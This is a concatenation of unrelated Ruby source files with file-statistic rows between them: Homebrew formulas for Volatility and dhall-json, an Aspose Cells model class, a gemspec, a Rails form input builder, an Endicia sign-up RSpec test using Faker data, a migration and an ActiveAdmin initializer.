on_linux do
depends_on "gmp"
end
resource "distorm3" do
url "https://files.pythonhosted.org/packages/2c/e3/84a3a99904c368daa1de5e85a6e9cc07189e7f66cb1338a9ebf93fa051bd/distorm3-3.4.1.tar.gz"
sha256 "0ed65741b31cc113f1c98641594fc3e24f0563b6977c5ea2a7d97983095caa0c"
end
resource "yara-python" do
url "https://files.pythonhosted.org/packages/1d/93/688492dcedbd57a9c0b4074aa47d39ac5f5e7411a8ce69b23e57a801e638/yara-python-3.10.0.tar.gz"
sha256 "2da1d94850cbea1dd9db1cc7d54bb36a69cd6a33bbc0caf003497b6a323e3e10"
end
resource "pycrypto" do
url "https://files.pythonhosted.org/packages/60/db/645aa9af249f059cc3a368b118de33889219e0362141e75d4eaf6f80f163/pycrypto-2.6.1.tar.gz"
sha256 "f2ce1e989b272cfcb677616763e0a2e7ec659effa67a88aa92b3a65528f60a3c"
end
resource "Pillow" do
url "https://files.pythonhosted.org/packages/51/fe/18125dc680720e4c3086dd3f5f95d80057c41ab98326877fc7d3ff6d0ee5/Pillow-6.1.0.tar.gz"
sha256 "0804f77cb1e9b6dbd37601cee11283bba39a8d44b9ddb053400c58e0c0d7d9de"
end
resource "openpyxl" do
url "https://files.pythonhosted.org/packages/ba/06/b899c8867518df19e242d8cbc82d4ba210f5ffbeebb7704c695e687ab59c/openpyxl-2.6.2.tar.gz"
sha256 "1d2af392cef8c8227bd2ac3ebe3a28b25aba74fd4fa473ce106065f0b73bfe2e"
end
resource "et_xmlfile" do
url "https://files.pythonhosted.org/packages/22/28/a99c42aea746e18382ad9fb36f64c1c1f04216f41797f2f0fa567da11388/et_xmlfile-1.0.1.tar.gz"
sha256 "614d9722d572f6246302c4491846d2c393c199cfa4edc9af593437691683335b"
end
resource "jdcal" do
url "https://files.pythonhosted.org/packages/7b/b0/fa20fce23e9c3b55b640e629cb5edf32a85e6af3cf7af599940eb0c753fe/jdcal-1.4.1.tar.gz"
sha256 "472872e096eb8df219c23f2689fc336668bdb43d194094b5cc1707e1640acfc8"
end
resource "ujson" do
url "https://files.pythonhosted.org/packages/16/c4/79f3409bc710559015464e5f49b9879430d8f87498ecdc335899732e5377/ujson-1.35.tar.gz"
sha256 "f66073e5506e91d204ab0c614a148d5aa938bdbf104751be66f8ad7a222f5f86"
end
resource "pytz" do
url "https://files.pythonhosted.org/packages/df/d5/3e3ff673e8f3096921b3f1b79ce04b832e0100b4741573154b72b756a681/pytz-2019.1.tar.gz"
sha256 "d747dd3d23d77ef44c6a3526e274af6efeb0a6f1afd5a69ba4d5be4098c8e141"
end
resource "ipython" do
url "https://files.pythonhosted.org/packages/41/a6/2d25314b1f9375639d8f8e0f8052e8cec5df511d3449f22c4f1c2d8cb3c6/ipython-5.8.0.tar.gz"
sha256 "4bac649857611baaaf76bc82c173aa542f7486446c335fe1a6c05d0d491c8906"
end
resource "appnope" do
url "https://files.pythonhosted.org/packages/26/34/0f3a5efac31f27fabce64645f8c609de9d925fe2915304d1a40f544cff0e/appnope-0.1.0.tar.gz"
sha256 "8b995ffe925347a2138d7ac0fe77155e4311a0ea6d6da4f5128fe4b3cbe5ed71"
end
resource "backports.shutil_get_terminal_size" do
url "https://files.pythonhosted.org/packages/ec/9c/368086faa9c016efce5da3e0e13ba392c9db79e3ab740b763fe28620b18b/backports.shutil_get_terminal_size-1.0.0.tar.gz"
sha256 "713e7a8228ae80341c70586d1cc0a8caa5207346927e23d09dcbcaf18eadec80"
end
resource "decorator" do
url "https://files.pythonhosted.org/packages/ba/19/1119fe7b1e49b9c8a9f154c930060f37074ea2e8f9f6558efc2eeaa417a2/decorator-4.4.0.tar.gz"
sha256 "86156361c50488b84a3f148056ea716ca587df2f0de1d34750d35c21312725de"
end
resource "enum34" do
url "https://files.pythonhosted.org/packages/bf/3e/31d502c25302814a7c2f1d3959d2a3b3f78e509002ba91aea64993936876/enum34-1.1.6.tar.gz"
sha256 "8ad8c4783bf61ded74527bffb48ed9b54166685e4230386a9ed9b1279e2df5b1"
end
resource "ipython_genutils" do
url "https://files.pythonhosted.org/packages/e8/69/fbeffffc05236398ebfcfb512b6d2511c622871dca1746361006da310399/ipython_genutils-0.2.0.tar.gz"
sha256 "eb2e116e75ecef9d4d228fdc66af54269afa26ab4463042e33785b887c628ba8"
end
resource "pathlib2" do
url "https://files.pythonhosted.org/packages/b5/f4/9c7cc726ece2498b6c8b62d3262aa43f59039b953fe23c9964ac5e18d40b/pathlib2-2.3.4.tar.gz"
sha256 "446014523bb9be5c28128c4d2a10ad6bb60769e78bd85658fe44a450674e0ef8"
end
resource "pexpect" do
url "https://files.pythonhosted.org/packages/1c/b1/362a0d4235496cb42c33d1d8732b5e2c607b0129ad5fdd76f5a583b9fcb3/pexpect-4.7.0.tar.gz"
sha256 "9e2c1fd0e6ee3a49b28f95d4b33bc389c89b20af6a1255906e90ff1262ce62eb"
end
resource "pickleshare" do
url "https://files.pythonhosted.org/packages/d8/b6/df3c1c9b616e9c0edbc4fbab6ddd09df9535849c64ba51fcb6531c32d4d8/pickleshare-0.7.5.tar.gz"
sha256 "87683d47965c1da65cdacaf31c8441d12b8044cdec9aca500cd78fc2c683afca"
end
resource "prompt_toolkit" do
url "https://files.pythonhosted.org/packages/94/a0/57dc47115621d9b3fcc589848cdbcbb6c4c130186e8fc4c4704766a7a699/prompt_toolkit-2.0.9.tar.gz"
sha256 "2519ad1d8038fd5fc8e770362237ad0364d16a7650fb5724af6997ed5515e3c1"
end
resource "ptyprocess" do
url "https://files.pythonhosted.org/packages/db/d7/b465161910f3d1cef593c5e002bff67e0384898f597f1a7fdc8db4c02bf6/ptyprocess-0.5.1.tar.gz"
sha256 "0530ce63a9295bfae7bd06edc02b6aa935619f486f0f1dc0972f516265ee81a6"
end
resource "Pygments" do
url "https://files.pythonhosted.org/packages/7e/ae/26808275fc76bf2832deb10d3a3ed3107bc4de01b85dcccbe525f2cd6d1e/Pygments-2.4.2.tar.gz"
sha256 "881c4c157e45f30af185c1ffe8d549d48ac9127433f2c380c24b84572ad66297"
end
resource "simplegeneric" do
url "https://files.pythonhosted.org/packages/3d/57/4d9c9e3ae9a255cd4e1106bb57e24056d3d0709fc01b2e3e345898e49d5b/simplegeneric-0.8.1.zip"
sha256 "dc972e06094b9af5b855b3df4a646395e43d1c9d0d39ed345b7393560d0b9173"
end
resource "six" do
url "https://files.pythonhosted.org/packages/dd/bf/4138e7bfb757de47d1f4b6994648ec67a51efe58fa907c1e11e350cddfca/six-1.12.0.tar.gz"
sha256 "d16a0141ec1a18405cd4ce8b4613101da75da0e9a7aec5bdd4fa804d0e0eba73"
end
resource "traitlets" do
url "https://files.pythonhosted.org/packages/a5/98/7f5ef2fe9e9e071813aaf9cb91d1a732e0a68b6c44a32b38cb8e14c3f069/traitlets-4.3.2.tar.gz"
sha256 "9c4bd2d267b7153df9152698efb1050a5d84982d3384a37b2c1f7723ba3e7835"
end
resource "wcwidth" do
url "https://files.pythonhosted.org/packages/55/11/e4a2bb08bb450fdbd42cc709dd40de4ed2c472cf0ccb9e64af22279c5495/wcwidth-0.1.7.tar.gz"
sha256 "3df37372226d6e63e1b1e1eda15c594bca98a22d33a23832a90998faa96bc65e"
end
def install
venv = virtualenv_create(libexec)
resource("Pillow").stage do
inreplace "setup.py" do |s|
if OS.mac?
sdkprefix = MacOS.sdk_path_if_needed ? MacOS.sdk_path : ""
else
zlib_prefix = Formula["zlib"].opt_prefix
end
s.gsub! "openjpeg.h", "probably_not_a_header_called_this_eh.h"
if OS.mac?
s.gsub! "ZLIB_ROOT = None", "ZLIB_ROOT = ('#{sdkprefix}/usr/lib', '#{sdkprefix}/usr/include')"
else
s.gsub! "ZLIB_ROOT = None", "ZLIB_ROOT = ('#{zlib_prefix}/lib', '#{zlib_prefix}/include')"
end
s.gsub! "JPEG_ROOT = None",
"JPEG_ROOT = ('#{Formula["jpeg"].opt_prefix}/lib', " \
"'#{Formula["jpeg"].opt_prefix}/include')"
s.gsub! "FREETYPE_ROOT = None",
"FREETYPE_ROOT = ('#{Formula["freetype"].opt_prefix}/lib', " \
"'#{Formula["freetype"].opt_prefix}/include')"
end
begin
# avoid triggering "helpful" distutils code that doesn't recognize Xcode 7 .tbd stubs
deleted = ENV.delete "SDKROOT"
if OS.mac? && !MacOS::CLT.installed?
ENV.append "CFLAGS", "-I#{MacOS.sdk_path}/System/Library/Frameworks/Tk.framework/Versions/8.5/Headers"
end
venv.pip_install Pathname.pwd
ensure
ENV["SDKROOT"] = deleted
end
end
res = resources.map(&:name).to_set - ["Pillow"]
res.each do |r|
# appnope is only intended for macOS and refuses to install elsewhere
venv.pip_install resource(r) unless r == "appnope"
end
venv.pip_install_and_link buildpath
end
test do
system "#{bin}/vol.py", "--info"
end
end
| 44.349754 | 164 | 0.778629 |
79694804cc4e478f6ea20269ecdf3baef4ce0201 | 7,284 | =begin
--------------------------------------------------------------------------------------------------------------------
Copyright (c) 2021 Aspose.Cells Cloud
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
--------------------------------------------------------------------------------------------------------------------
=end
require 'date'
module AsposeCellsCloud
class Color
attr_accessor :a
attr_accessor :b
attr_accessor :r
attr_accessor :g
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'a' => :'A',
:'b' => :'B',
:'r' => :'R',
:'g' => :'G'
}
end
# Attribute type mapping.
def self.swagger_types
{
:'a' => :'Integer',
:'b' => :'Integer',
:'r' => :'Integer',
:'g' => :'Integer'
}
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}){|(k,v), h| h[k.to_sym] = v}
if attributes.has_key?(:'A')
self.a = attributes[:'A']
end
if attributes.has_key?(:'B')
self.b = attributes[:'B']
end
if attributes.has_key?(:'R')
self.r = attributes[:'R']
end
if attributes.has_key?(:'G')
self.g = attributes[:'G']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properies with the reasons
def list_invalid_properties
invalid_properties = Array.new
if @a.nil?
invalid_properties.push("invalid value for 'a', a cannot be nil.")
end
if @b.nil?
invalid_properties.push("invalid value for 'b', b cannot be nil.")
end
if @r.nil?
invalid_properties.push("invalid value for 'r', r cannot be nil.")
end
if @g.nil?
invalid_properties.push("invalid value for 'g', g cannot be nil.")
end
return invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
return false if @a.nil?
return false if @b.nil?
return false if @r.nil?
return false if @g.nil?
return true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
a == o.a &&
b == o.b &&
r == o.r &&
g == o.g
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[a, b, r, g].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map{ |v| _deserialize($1, v) } )
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end # or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :BOOLEAN
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
temp_model = AsposeCellsCloud.const_get(type).new
temp_model.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
next if value.nil?
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map{ |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 29.609756 | 116 | 0.596787 |
28fbf25058b86fff7cd39530d3431ea6066f04b6 | 1,490 | # -*- encoding: utf-8 -*-
# stub: addressable 2.5.2 ruby lib
Gem::Specification.new do |s|
s.name = "addressable".freeze
s.version = "2.5.2"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib".freeze]
s.authors = ["Bob Aman".freeze]
s.date = "2017-08-25"
s.description = "Addressable is a replacement for the URI implementation that is part of\nRuby's standard library. It more closely conforms to the relevant RFCs and\nadds support for IRIs and URI templates.\n".freeze
s.email = "[email protected]".freeze
s.extra_rdoc_files = ["README.md".freeze]
s.files = ["README.md".freeze]
s.homepage = "https://github.com/sporkmonger/addressable".freeze
s.licenses = ["Apache-2.0".freeze]
s.rdoc_options = ["--main".freeze, "README.md".freeze]
s.required_ruby_version = Gem::Requirement.new(">= 2.0".freeze)
s.rubygems_version = "3.1.6".freeze
s.summary = "URI Implementation".freeze
s.installed_by_version = "3.1.6" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
end
if s.respond_to? :add_runtime_dependency then
s.add_runtime_dependency(%q<public_suffix>.freeze, [">= 2.0.2", "< 4.0"])
s.add_development_dependency(%q<bundler>.freeze, ["~> 1.0"])
else
s.add_dependency(%q<public_suffix>.freeze, [">= 2.0.2", "< 4.0"])
s.add_dependency(%q<bundler>.freeze, ["~> 1.0"])
end
end
| 40.27027 | 218 | 0.697315 |
6ac26c6333cc9cd396a683302c851b165b85d946 | 8,789 | class NestedInstrumentInput < NestedAttributesInput
protected
def build_components(attribute_name, value, index, options, [email protected]_name)
out = ''
# Inherit required for fields validated in nested attributes
required = false
if object.required?(:complex_person) and index == 0
required = true
end
# Add remove element only if element repeats
repeats =options.delete(:repeats)
repeats = true if repeats.nil?
parent_attribute = name_for(attribute_name, index, '', parent)[0..-5]
# --- title
field = :title
field_name = name_for(attribute_name, index, field, parent)
field_id = id_for(attribute_name, index, field, parent)
field_value = value.send(field).first
out << "<div class='row'>"
out << " <div class='col-md-3'>"
out << template.label_tag(field_name, field.to_s.humanize, required: required)
out << ' </div>'
out << " <div class='col-md-9'>"
out << @builder.text_field(field_name,
options.merge(value: field_value, name: field_name, id: field_id, required: required))
out << ' </div>'
out << '</div>' # row
# --- alternative_title
field = :alternative_title
field_name = name_for(attribute_name, index, field, parent)
field_id = id_for(attribute_name, index, field, parent)
field_value = value.send(field).first
out << "<div class='row'>"
out << " <div class='col-md-3'>"
out << template.label_tag(field_name, field.to_s.humanize, required: required)
out << ' </div>'
out << " <div class='col-md-9'>"
out << @builder.text_field(field_name,
options.merge(value: field_value, name: field_name, id: field_id, required: required))
out << ' </div>'
out << '</div>' # row
# --- complex_date
field = :complex_date
field_value = value.send(field)
if field_value.blank?
value.complex_date.build
value.complex_date[0]['description'] = 'Processed'
field_value = value.send(field)
end
nested_fields = NestedDateInput.new(@builder, field, nil, :multi_value, {})
out << "<div class='inner-nested'>"
out << "<div class='form-group'>"
out << " <label class='control-label optional' for='dataset_#{field.to_s}'>Date</label>"
out << nested_fields.nested_input({:class=>"form-control", :repeats => false}, field_value, parent_attribute)
out << "</div>"
# out << " <button type='button' class='btn btn-link add'>"
# out << " <span class='glyphicon glyphicon-plus'></span>"
# out << " <span class='controls-add-text'>Add another date</span>"
# out << " </button>"
out << "</div>" # row
# --- description
field = :description
field_name = name_for(attribute_name, index, field, parent)
field_id = id_for(attribute_name, index, field, parent)
field_value = value.send(field).first
out << "<div class='row'>"
out << " <div class='col-md-3'>"
out << template.label_tag(field_name, field.to_s.humanize, required: required)
out << ' </div>'
out << " <div class='col-md-9'>"
out << @builder.text_field(field_name,
options.merge(value: field_value, name: field_name, id: field_id, required: required))
out << ' </div>'
out << '</div>' # row
# --- complex_identifier
field = :complex_identifier
field_value = value.send(field)
if field_value.blank?
value.complex_identifier.build
field_value = value.send(field)
end
nested_fields = NestedIdentifierInput.new(@builder, field, nil, :multi_value, {})
out << "<div class='inner-nested'>"
out << "<div class='form-group'>"
out << " <label class='control-label optional' for='dataset_#{field.to_s}'>Identifier</label>"
out << nested_fields.nested_input({:class=>"form-control", :repeats => false}, field_value, parent_attribute)
out << "</div>"
# out << " <button type='button' class='btn btn-link add'>"
# out << " <span class='glyphicon glyphicon-plus'></span>"
# out << " <span class='controls-add-text'>Add another identifier</span>"
# out << " </button>"
out << "</div>" # row
# --- instrument_function
field = :instrument_function
field_value = value.send(field)
if field_value.blank?
value.instrument_function.build
field_value = value.send(field)
end
nested_fields = NestedInstrumentFunctionInput.new(@builder, field, nil, :multi_value, {})
out << "<div class='inner-nested'>"
out << "<div class='form-group'>"
out << " <label class='control-label optional' for='dataset_#{field.to_s}'>Instrument function</label>"
out << nested_fields.nested_input({:class=>"form-control", :repeats => false}, field_value, parent_attribute)
out << "</div>"
# out << " <button type='button' class='btn btn-link add'>"
# out << " <span class='glyphicon glyphicon-plus'></span>"
# out << " <span class='controls-add-text'>Add another instrument function</span>"
# out << " </button>"
out << "</div>" # row
# --- manufacturer
field = :manufacturer
field_value = value.send(field)
if field_value.blank?
value.manufacturer.build
value.manufacturer[0].purpose = 'Manufacturer'
field_value = value.send(field)
end
nested_fields = NestedOrganizationInput.new(@builder, field, nil, :multi_value, {})
out << "<div class='inner-nested'>"
out << "<div class='form-group'>"
out << " <label class='control-label optional' for='dataset_complex_orgnaization'>Manufacturer</label>"
out << nested_fields.nested_input({:class=>"form-control", :repeats => false}, field_value, parent_attribute)
out << "</div>"
# out << " <button type='button' class='btn btn-link add'>"
# out << " <span class='glyphicon glyphicon-plus'></span>"
# out << " <span class='controls-add-text'>Add another manufacturer</span>"
# out << " </button>"
out << "</div>" # row
# --- model_number
field = :model_number
field_name = name_for(attribute_name, index, field, parent)
field_id = id_for(attribute_name, index, field, parent)
field_value = value.send(field).first
out << "<div class='row'>"
out << " <div class='col-md-3'>"
out << template.label_tag(field_name, field.to_s.humanize, required: required)
out << ' </div>'
out << " <div class='col-md-9'>"
out << @builder.text_field(field_name,
options.merge(value: field_value, name: field_name, id: field_id, required: required))
out << ' </div>'
out << '</div>' # row
# --- complex_person
field = :complex_person
field_value = value.send(field)
if field_value.blank?
value.complex_person.build
value.complex_person[0].role = 'operator'
field_value = value.send(field)
end
nested_fields = NestedPersonInput.new(@builder, field, nil, :multi_value, {})
out << "<div class='inner-nested'>"
out << "<div class='form-group'>"
out << " <label class='control-label optional' for='dataset_complex_orgnaization'>Operator</label>"
out << nested_fields.nested_input({:class=>"form-control", :repeats => false}, field_value, parent_attribute)
out << "</div>"
# out << " <button type='button' class='btn btn-link add'>"
# out << " <span class='glyphicon glyphicon-plus'></span>"
# out << " <span class='controls-add-text'>Add another operator</span>"
# out << " </button>"
out << "</div>" # row
# --- managing_organization
field = :managing_organization
field_value = value.send(field)
if field_value.blank?
value.managing_organization.build
value.managing_organization[0].purpose = 'Managing organization'
field_value = value.send(field)
end
nested_fields = NestedOrganizationInput.new(@builder, field, nil, :multi_value, {})
out << "<div class='inner-nested'>"
out << "<div class='form-group'>"
out << " <label class='control-label optional' for='dataset_complex_orgnaization'>Managing organization</label>"
out << nested_fields.nested_input({:class=>"form-control", :repeats => false}, field_value, parent_attribute)
out << "</div>"
# out << " <button type='button' class='btn btn-link add'>"
# out << " <span class='glyphicon glyphicon-plus'></span>"
# out << " <span class='controls-add-text'>Add another managing organization</span>"
# out << " </button>"
out << "</div>" # row
# last row
# --- delete checkbox
if repeats == true
out << "<div class='row'>"
field_label = 'Instrument'
out << " <div class='col-md-3'>"
out << destroy_widget(attribute_name, index, field_label, parent)
out << ' </div>'
out << '</div>' # last row
end
out
end
end
| 39.95 | 117 | 0.629878 |
036b0a45ccaef39443bb9d82640526eab81f741c | 572 | # Remove did_you_mean as it's very annoying in a Rakefile
DidYouMean::Correctable.send(:remove_method, :to_s) if defined? DidYouMean
# Colorize error messages when the trace output is a TTY
module ColorizeExceptionMessageDetails
def display_exception_message_details(ex)
return super unless (options.trace_output || $stderr)&.isatty
if ex.instance_of?(RuntimeError)
trace "\e[31;01m#{ex.message}\e[0m"
else
trace "\e[31;01m#{ex.class.name}: \e[0m#{ex.message}"
end
end
end
Rake::Application.send(:prepend, ColorizeExceptionMessageDetails)
| 35.75 | 74 | 0.75 |
e8795f5dc88727b2f929031d9bc2d5cc4762933d | 125 | class AddStrictFieldToPhone < ActiveRecord::Migration
def change
add_column :phones, :strict_number, :string
end
end
| 20.833333 | 53 | 0.776 |
214ae0163b08632720594ab1264512cbac14a9b1 | 1,265 | require "language/haskell"
class DhallJson < Formula
include Language::Haskell::Cabal
desc "Dhall to JSON compiler and a Dhall to YAML compiler"
homepage "https://github.com/Gabriel439/Haskell-Dhall-JSON-Library"
url "https://hackage.haskell.org/package/dhall-json-1.2.3/dhall-json-1.2.3.tar.gz"
sha256 "83cb1e27f937c50ba6852eeb55ed3f06af8db9b73716bfa8c1326699482ffcda"
head "https://github.com/Gabriel439/Haskell-Dhall-JSON-Library.git"
revision 1 unless OS.mac?
unless OS.mac?
depends_on "ncurses"
depends_on "zlib"
end
bottle do
cellar :any_skip_relocation
sha256 "bab7d01fcbe420e80d7a5f430912a0ac2e758b94533df421cfcb672f7b9388cb" => :mojave
sha256 "7eebce96f35a991539034c2939dbffe8d36606b2b134eb2a164efb01956bfe7a" => :high_sierra
sha256 "9b24081f5cb6d98467ef9ba670336166dc0f2a68733667147b08fb929d7c0bb3" => :sierra
sha256 "46a7cf5d4660faefe3cd940ca9eab0e445b97a70b8a4a3d4d8eef19521995f4e" => :el_capitan
sha256 "160623428b4444a9ad6c64654d9ae8259bdc4d76ddce5b9b8d3850a3fd821150" => :x86_64_linux
end
depends_on "cabal-install" => :build
depends_on "ghc" => :build
def install
install_cabal_package
end
test do
assert_match "1", pipe_output("#{bin}/dhall-to-json", "1", 0)
end
end
| 33.289474 | 94 | 0.777075 |
216df3970eb47e614c8d061abd324b6b4698b19b | 3,216 | require 'spec_helper'
require 'tempfile'
require 'faker'
describe EndiciaLabelServer::Connection, '.sign_up' do
before do
Excon.defaults[:mock] = true
end
after do
Excon.stubs.clear
end
let(:stub_path) { File.expand_path("../../../stubs", __FILE__) }
let(:server) { EndiciaLabelServer::Connection.new(test_mode: true) }
context "if signing up a new user" do
before do
Excon.stub({:method => :post}) do |params|
case params[:path]
when "#{EndiciaLabelServer::Connection::ROOT_PATH}#{EndiciaLabelServer::Connection::GET_USER_SIGNUP_ENDPOINT}"
{body: File.read("#{stub_path}/user_sign_up_success.xml"), status: 200}
end
end
end
subject do
server.sign_up do |b|
b.add :requester_id, ENV['ENDICIA_REQUESTER_ID']
b.add :request_id, 'ABC'
b.add :first_name, Faker::Name.first_name
b.add :middle_name, Faker::Name.first_name
b.add :last_name, Faker::Name.last_name
b.add :title, Faker::Name.prefix
b.add :email_address, Faker::Internet.email
b.add :phone_number, Faker::PhoneNumber.phone_number
b.add :phone_number_ext, Faker::PhoneNumber.extension
b.add :fax_number, Faker::PhoneNumber.phone_number
b.add :partner_id, ENV['ENDICIA_REQUESTER_ID']
b.add :originating_ip_address, Faker::Internet.ip_v4_address
b.add :contracts, {
contact_id: 'CID78786'
}
b.add :account_credentials, {
web_password: Faker::Internet.password(8),
temporary_pass_phrase: Faker::Internet.password(8),
security_question: 'What is love?',
security_answer: 'Baby dont hurt me, no more'
}
b.add :physical_address, {
first_name: Faker::Name.first_name,
last_name: Faker::Name.last_name,
company_name: Faker::Company.name,
suite_or_apt: '21',
address: '389 Townsend Street',
city: 'San Francisco',
state: 'CA',
zip5: '94107',
phone: Faker::PhoneNumber.phone_number,
extension: Faker::PhoneNumber.extension
}
b.add :mailing_address, {
first_name: Faker::Name.first_name,
last_name: Faker::Name.last_name,
company_name: Faker::Company.name,
suite_or_apt: '21',
address: '389 Townsend Street',
city: 'San Francisco',
state: 'CA',
zip5: '94107',
phone: Faker::PhoneNumber.phone_number,
extension: Faker::PhoneNumber.extension
}
b.add :credit_card, {
credit_card_number: '4242-4242-4242-4242',
credit_card_type: 'Visa',
credit_card_month: Date::MONTHNAMES[Faker::Business.credit_card_expiry_date.month],
credit_card_year: '2020',
credit_card_address: '389 Townsend Street',
credit_card_city: 'San Francisco',
credit_card_state: 'CA',
credit_card_zip5: '94107',
}
b.add :i_certify, "true"
end
end
it "should return a single rate" do
expect { subject }.not_to raise_error
expect(subject.success?).to be_truthy
end
end
end
| 34.212766 | 118 | 0.61847 |
9178f1ca3917deecb3ab8c9efb0f547d74bb2591 | 9,389 | ActiveAdmin.setup do |config|
# == Site Title
#
# Set the title that is displayed on the main layout
# for each of the active admin pages.
#
config.site_title = 'Produciton'
# Set the link url for the title. For example, to take
# users to your main site. Defaults to no link.
#
# config.site_title_link = "/"
# Set an optional image to be displayed for the header
# instead of a string (overrides :site_title)
#
# Note: Aim for an image that's 21px high so it fits in the header.
#
# config.site_title_image = "logo.png"
# == Default Namespace
#
# Set the default namespace each administration resource
# will be added to.
#
# eg:
# config.default_namespace = :hello_world
#
# This will create resources in the HelloWorld module and
# will namespace routes to /hello_world/*
#
# To set no namespace by default, use:
# config.default_namespace = false
#
# Default:
# config.default_namespace = :admin
#
# You can customize the settings for each namespace by using
# a namespace block. For example, to change the site title
# within a namespace:
#
# config.namespace :admin do |admin|
# admin.site_title = "Custom Admin Title"
# end
#
# This will ONLY change the title for the admin section. Other
# namespaces will continue to use the main "site_title" configuration.
# == User Authentication
#
# Active Admin will automatically call an authentication
# method in a before filter of all controller actions to
# ensure that there is a currently logged in admin user.
#
# This setting changes the method which Active Admin calls
# within the application controller.
config.authentication_method = :authenticate_admin!
# == User Authorization
#
# Active Admin will automatically call an authorization
# method in a before filter of all controller actions to
# ensure that there is a user with proper rights. You can use
# CanCanAdapter or make your own. Please refer to documentation.
# config.authorization_adapter = ActiveAdmin::CanCanAdapter
# In case you prefer Pundit over other solutions you can here pass
# the name of default policy class. This policy will be used in every
# case when Pundit is unable to find suitable policy.
# config.pundit_default_policy = "MyDefaultPunditPolicy"
# You can customize your CanCan Ability class name here.
# config.cancan_ability_class = "Ability"
# You can specify a method to be called on unauthorized access.
# This is necessary in order to prevent a redirect loop which happens
# because, by default, user gets redirected to Dashboard. If user
# doesn't have access to Dashboard, he'll end up in a redirect loop.
# Method provided here should be defined in application_controller.rb.
# config.on_unauthorized_access = :access_denied
# == Current User
#
# Active Admin will associate actions with the current
# user performing them.
#
# This setting changes the method which Active Admin calls
# (within the application controller) to return the currently logged in user.
config.current_user_method = :current_admin
# == Logging Out
#
# Active Admin displays a logout link on each screen. These
# settings configure the location and method used for the link.
#
# This setting changes the path where the link points to. If it's
# a string, the strings is used as the path. If it's a Symbol, we
# will call the method to return the path.
#
# Default:
config.logout_link_path = :destroy_admin_session_path
# This setting changes the http method used when rendering the
# link. For example :get, :delete, :put, etc..
#
# Default:
# config.logout_link_method = :get
# == Root
#
# Set the action to call for the root path. You can set different
# roots for each namespace.
#
# Default:
# config.root_to = 'dashboard#index'
# == Admin Comments
#
# This allows your users to comment on any resource registered with Active Admin.
#
# You can completely disable comments:
# config.comments = false
#
# You can change the name under which comments are registered:
# config.comments_registration_name = 'AdminComment'
#
# You can change the order for the comments and you can change the column
# to be used for ordering:
# config.comments_order = 'created_at ASC'
#
# You can disable the menu item for the comments index page:
# config.comments_menu = false
#
# You can customize the comment menu:
# config.comments_menu = { parent: 'Admin', priority: 1 }
# == Batch Actions
#
# Enable and disable Batch Actions
#
config.batch_actions = true
# == Controller Filters
#
# You can add before, after and around filters to all of your
# Active Admin resources and pages from here.
#
# config.before_action :do_something_awesome
